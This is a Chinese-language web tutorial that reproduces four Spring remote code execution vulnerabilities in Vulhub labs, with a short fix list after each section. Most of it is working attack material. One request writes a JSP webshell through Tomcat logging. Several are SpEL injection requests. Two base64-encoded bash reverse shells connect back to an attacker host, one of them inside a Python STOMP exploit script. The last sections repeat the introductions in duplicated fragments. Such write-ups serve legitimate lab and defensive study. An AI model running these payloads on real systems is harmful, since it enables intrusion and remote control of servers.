Spring框架漏洞解析与复现指南<\/h1>

目录<\/h2>

Spring Framework 远程代码执行漏洞(CVE-2022-22965)<\/a><\/li>
Spring Cloud Gateway 远程代码执行(CVE-2022-22947)<\/a><\/li>
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)<\/a><\/li>

Spring Messaging 远程命令执行漏洞(CVE-2018-1270)<\/a><\/li> <\/ol>

Spring Framework 远程代码执行漏洞(CVE-2022-22965)<\/h2>

漏洞简介<\/h3>
该漏洞(CVE-2022-22965)是在Java 9环境下，引入了`class.module.classLoader<\/code>属性，导致可以绕过CVE-2010-1622漏洞的补丁。JDK9中存在可以绕过黑名单禁用的类，从而导致了此漏洞。<\/p>`

实验环境<\/h3>

攻击机: Kali Linux (192.168.200.14)<\/li>
靶机: Ubuntu (192.168.200.47)<\/li>
实验平台: Vulhub<\/li>
<\/ul>
漏洞复现步骤<\/h3>


环境准备<\/strong><\/p>
cd \/vulhub\/spring\/CVE-2022-22965
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre><\/li>

访问目标环境<\/strong><\/p>
http:\/\/192.168.200.47:8080
<\/code><\/pre>
<\/li>

构造Payload修改Tomcat日志配置<\/strong>

发送以下GET请求以更改Apache Tomcat的日志记录配置，并将日志写入为JSP文件：<\/p>
GET<\/span> \/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps\/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.147:8080<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>suffix:<\/span> %>\/\/<\/span>
<\/span><\/span>c1:<\/span> Runtime<\/span>
<\/span><\/span>c2:<\/span> <%<\/span>
<\/span><\/span>DNT:<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre><\/li>

访问Webshell执行命令<\/strong><\/p>
http:\/\/192.168.200.47:8080\/tomcatwar.jsp?pwd=j&cmd=id
<\/code><\/pre>
<\/li>
<\/ol>
漏洞修复<\/h3>

升级Spring Framework到安全版本<\/li>
限制对危险类的访问<\/li>
<\/ul>

Spring Cloud Gateway 远程代码执行(CVE-2022-22947)<\/h2>
漏洞简介<\/h3>
Spring Cloud Gateway提供了一个在Spring WebFlux之上构建API网关的库。在3.1.0和3.0.6之前的版本中，当启用或暴露不安全的Gateway Actuator端点时，应用程序容易受到代码注入攻击，远程攻击者可以通过发送恶意请求执行任意代码。<\/p>
实验环境<\/h3>

攻击机: Kali Linux (192.168.200.14)<\/li>
靶机: Ubuntu (192.168.200.47)<\/li>
实验平台: Vulhub<\/li>
<\/ul>
漏洞复现步骤<\/h3>


环境准备<\/strong><\/p>
cd \/vulhub\/spring\/CVE-2022-22947
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre><\/li>

构造恶意路由<\/strong>

发送POST请求添加包含恶意SpEL表达式的路由：<\/p>
POST<\/span> \/actuator\/gateway\/routes\/hacktest HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.47:8080<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>Content-Length:<\/span> 310<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "id"<\/span>: "hacktest"<\/span>,
<\/span><\/span>  "filters"<\/span>: [{
<\/span><\/span>    "name"<\/span>: "AddResponseHeader"<\/span>,
<\/span><\/span>    "args"<\/span>: {
<\/span><\/span>      "name"<\/span>: "Result"<\/span>,
<\/span><\/span>      "value"<\/span>: "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"<\/span>
<\/span><\/span>    }
<\/span><\/span>  }],
<\/span><\/span>  "uri"<\/span>: "http:\/\/example.com"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

刷新路由触发执行<\/strong><\/p>
POST<\/span> \/actuator\/gateway\/refresh HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.47:8080<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 0<\/span>
<\/span><\/span><\/code><\/pre><\/li>

查看执行结果<\/strong><\/p>
GET<\/span> \/actuator\/gateway\/routes\/hacktest HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.47:8080<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 0<\/span>
<\/span><\/span><\/code><\/pre><\/li>

清理环境<\/strong><\/p>
DELETE<\/span> \/actuator\/gateway\/routes\/hacktest HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.47:8080<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复<\/h3>

升级Spring Cloud Gateway到3.1.0+或3.0.6+版本<\/li>
禁用或保护Actuator端点<\/li>
<\/ul>

Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)<\/h2>
漏洞简介<\/h3>
Spring Data Commons是Spring Data下所有子项目共享的基础框架。在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。<\/p>
实验环境<\/h3>

攻击机: Kali Linux (192.168.200.14)<\/li>
靶机: Ubuntu (192.168.200.47)<\/li>
实验平台: Vulhub<\/li>
<\/ul>
漏洞复现步骤<\/h3>


环境准备<\/strong><\/p>
cd \/vulhub\/spring\/CVE-2018-1273
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre><\/li>

访问用户注册页面<\/strong><\/p>
http:\/\/192.168.200.47:8080\/users
<\/code><\/pre>
<\/li>

构造恶意POST请求<\/strong><\/p>
POST<\/span> \/users?page=&size=5 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.200.47:8080<\/span>
<\/span><\/span>Connection:<\/span> keep-alive<\/span>
<\/span><\/span>Content-Length:<\/span> 124<\/span>
<\/span><\/span>Pragma:<\/span> no-cache<\/span>
<\/span><\/span>Cache-Control:<\/span> no-cache<\/span>
<\/span><\/span>Origin:<\/span> http:\/\/localhost:8080<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/64.0.3282.186 Safari\/537.36<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/localhost:8080\/users?page=0&size=5<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.9,en;q=0.8<\/span>
<\/span><\/span>
<\/span><\/span>username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch \/tmp\/success")]=&password=&repeatedPassword=
<\/span><\/span><\/code><\/pre><\/li>

验证命令执行<\/strong><\/p>
docker compose exec spring bash
<\/span><\/span>ls \/tmp\/success
<\/span><\/span><\/code><\/pre><\/li>

反弹Shell(可选)<\/strong>

使用base64编码的反弹shell命令：<\/p>
bash -c {<\/span>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODg4IDA+JjE=}<\/span>|{<\/span>base64,-d}<\/span>|{<\/span>bash,-i}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复<\/h3>

升级Spring Data Commons到2.0.6+版本<\/li>
对用户输入进行严格过滤<\/li>
<\/ul>

Spring Messaging 远程命令执行漏洞(CVE-2018-1270)<\/h2>
漏洞简介<\/h3>
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现，STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞，攻击者可以通过构造恶意的消息实现远程代码执行。<\/p>
实验环境<\/h3>

攻击机: Kali Linux (192.168.200.14)<\/li>
靶机: Ubuntu (192.168.200.47)<\/li>
实验平台: Vulhub<\/li>
<\/ul>
漏洞复现步骤<\/h3>


环境准备<\/strong><\/p>
cd \/vulhub\/spring\/CVE-2018-1270
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre><\/li>

使用Python3执行EXP脚本<\/strong>

以下是关键代码部分：<\/p>
#!\/usr\/bin\/env python3<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> random
<\/span><\/span>import<\/span> string
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> threading
<\/span><\/span>import<\/span> logging
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>logging.<\/span>basicConfig(stream=<\/span>sys.<\/span>stdout, level=<\/span>logging.<\/span>INFO)
<\/span><\/span>
<\/span><\/span>def<\/span> random_str<\/span>(length):
<\/span><\/span>    letters =<\/span> string.<\/span>ascii_lowercase +<\/span> string.<\/span>digits
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(random.<\/span>choice(letters) for<\/span> c in<\/span> range(length))
<\/span><\/span>
<\/span><\/span>class<\/span> SockJS<\/span>(threading.<\/span>Thread):
<\/span><\/span>    def<\/span> __init__(self, url, *<\/span>args, **<\/span>kwargs):
<\/span><\/span>        super().<\/span>__init__(*<\/span>args, **<\/span>kwargs)
<\/span><\/span>        self.<\/span>base =<\/span> f<\/span>'<\/span>{<\/span>url}<\/span>\/<\/span>{<\/span>random.<\/span>randint(0<\/span>, 1000<\/span>)}<\/span>\/<\/span>{<\/span>random_str(8<\/span>)}<\/span>'<\/span>
<\/span><\/span>        self.<\/span>daemon =<\/span> True<\/span>
<\/span><\/span>        self.<\/span>session =<\/span> requests.<\/span>session()
<\/span><\/span>        self.<\/span>session.<\/span>headers =<\/span> {
<\/span><\/span>            'Referer'<\/span>: url,
<\/span><\/span>            'User-Agent'<\/span>: 'Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)'<\/span>
<\/span><\/span>        }
<\/span><\/span>        self.<\/span>t =<\/span> int(time.<\/span>time() *<\/span> 1000<\/span>)
<\/span><\/span>
<\/span><\/span>    def<\/span> run<\/span>(self):
<\/span><\/span>        url =<\/span> f<\/span>'<\/span>{<\/span>self.<\/span>base}<\/span>\/htmlfile?c=_jp.vulhub'<\/span>
<\/span><\/span>        response =<\/span> self.<\/span>session.<\/span>get(url, stream=<\/span>True<\/span>)
<\/span><\/span>        for<\/span> line in<\/span> response.<\/span>iter_lines():
<\/span><\/span>            time.<\/span>sleep(0.5<\/span>)
<\/span><\/span>
<\/span><\/span>    def<\/span> send<\/span>(self, command, headers, body=<\/span>''<\/span>):
<\/span><\/span>        data =<\/span> [command.<\/span>upper(), '<\/span>\n<\/span>'<\/span>]
<\/span><\/span>        data.<\/span>append('<\/span>\n<\/span>'<\/span>.<\/span>join([f<\/span>'<\/span>{<\/span>k}<\/span>:<\/span>{<\/span>v}<\/span>'<\/span> for<\/span> k, v in<\/span> headers.<\/span>items()]))
<\/span><\/span>        data.<\/span>append('<\/span>\n\n<\/span>'<\/span>)
<\/span><\/span>        data.<\/span>append(body)
<\/span><\/span>        data.<\/span>append('<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>        data =<\/span> json.<\/span>dumps([''<\/span>.<\/span>join(data)])
<\/span><\/span>        response =<\/span> self.<\/span>session.<\/span>post(f<\/span>'<\/span>{<\/span>self.<\/span>base}<\/span>\/xhr_send?t=<\/span>{<\/span>self.<\/span>t}<\/span>'<\/span>, data=<\/span>data)
<\/span><\/span>        if<\/span> response.<\/span>status_code !=<\/span> 204<\/span>:
<\/span><\/span>            logging.<\/span>info(f<\/span>"send '<\/span>{<\/span>command}<\/span>' data error."<\/span>)
<\/span><\/span>        else<\/span>:
<\/span><\/span>            logging.<\/span>info(f<\/span>"send '<\/span>{<\/span>command}<\/span>' data success."<\/span>)
<\/span><\/span>
<\/span><\/span>    def<\/span> __del__(self):
<\/span><\/span>        self.<\/span>session.<\/span>close()
<\/span><\/span>
<\/span><\/span>sockjs =<\/span> SockJS('http:\/\/192.168.200.47:8080\/gs-guide-websocket'<\/span>)
<\/span><\/span>sockjs.<\/span>start()
<\/span><\/span>time.<\/span>sleep(1<\/span>)
<\/span><\/span>sockjs.<\/span>send('connect'<\/span>, {
<\/span><\/span>    'accept-version'<\/span>: '1.1,1.0'<\/span>,
<\/span><\/span>    'heart-beat'<\/span>: '10000,10000'<\/span>
<\/span><\/span>})
<\/span><\/span>sockjs.<\/span>send('subscribe'<\/span>, {
<\/span><\/span>    'selector'<\/span>: "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODk5IDA+JjE=}|{base64,-d}|{bash,-i}')"<\/span>,
<\/span><\/span>    'id'<\/span>: 'sub-0'<\/span>,
<\/span><\/span>    'destination'<\/span>: '\/topic\/greetings'<\/span>
<\/span><\/span>})
<\/span><\/span>data =<\/span> json.<\/span>dumps({'name'<\/span>: 'vulhub'<\/span>})
<\/span><\/span>sockjs.<\/span>send('send'<\/span>, {
<\/span><\/span>    'content-length'<\/span>: len(data),
<\/span><\/span>    'destination'<\/span>: '\/app\/hello'<\/span>
<\/span><\/span>}, data)
<\/span><\/span><\/code><\/pre><\/li>

监听反弹Shell<\/strong><\/p>
nc -lvnp 8899<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复<\/h3>

升级Spring Framework到5.0.5+版本<\/li>
禁用不必要的STOMP端点<\/li>
<\/ul>

总结<\/h2>
本文详细分析了四个Spring框架中的高危漏洞，包括它们的原理、复现步骤和修复方案。这些漏洞都允许远程攻击者执行任意代码，危害极大。安全建议包括：<\/p>

及时更新Spring框架及相关组件到最新安全版本<\/li>
禁用不必要的功能和端点<\/li>
对用户输入进行严格过滤和验证<\/li>
最小化应用程序的权限<\/li>
<\/ol>
在实际生产环境中，应定期进行安全评估和漏洞扫描，确保系统不受已知漏洞的影响。<\/p>

Spring框架漏洞解析与复现指南<\/h1>

Spring Framework 远程代码执行漏洞(CVE-2022-22965)<\/h2>

漏洞简介<\/h3> 该漏洞(CVE-2022-22965)是在Java 9环境下，引入了class.module.classLoader<\/code>属性，导致可以绕过CVE-2010-1622漏洞的补丁。JDK9中存在可以绕过黑名单禁用的类，从而导致了此漏洞。<\/p>

Spring Cloud Gateway 远程代码执行(CVE-2022-22947)<\/h2>

Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)<\/h2>

漏洞简介<\/h3> Spring Data Commons是Spring Data下所有子项目共享的基础框架。在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。<\/p>

Spring Messaging 远程命令执行漏洞(CVE-2018-1270)<\/h2>

漏洞简介<\/h3> Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现，STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞，攻击者可以通过构造恶意的消息实现远程代码执行。<\/p>

漏洞简介<\/h3>
该漏洞(CVE-2022-22965)是在Java 9环境下，引入了`class.module.classLoader<\/code>属性，导致可以绕过CVE-2010-1622漏洞的补丁。JDK9中存在可以绕过黑名单禁用的类，从而导致了此漏洞。<\/p>`

漏洞简介<\/h3>
Spring Data Commons是Spring Data下所有子项目共享的基础框架。在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。<\/p>

漏洞简介<\/h3>
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现，STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞，攻击者可以通过构造恶意的消息实现远程代码执行。<\/p>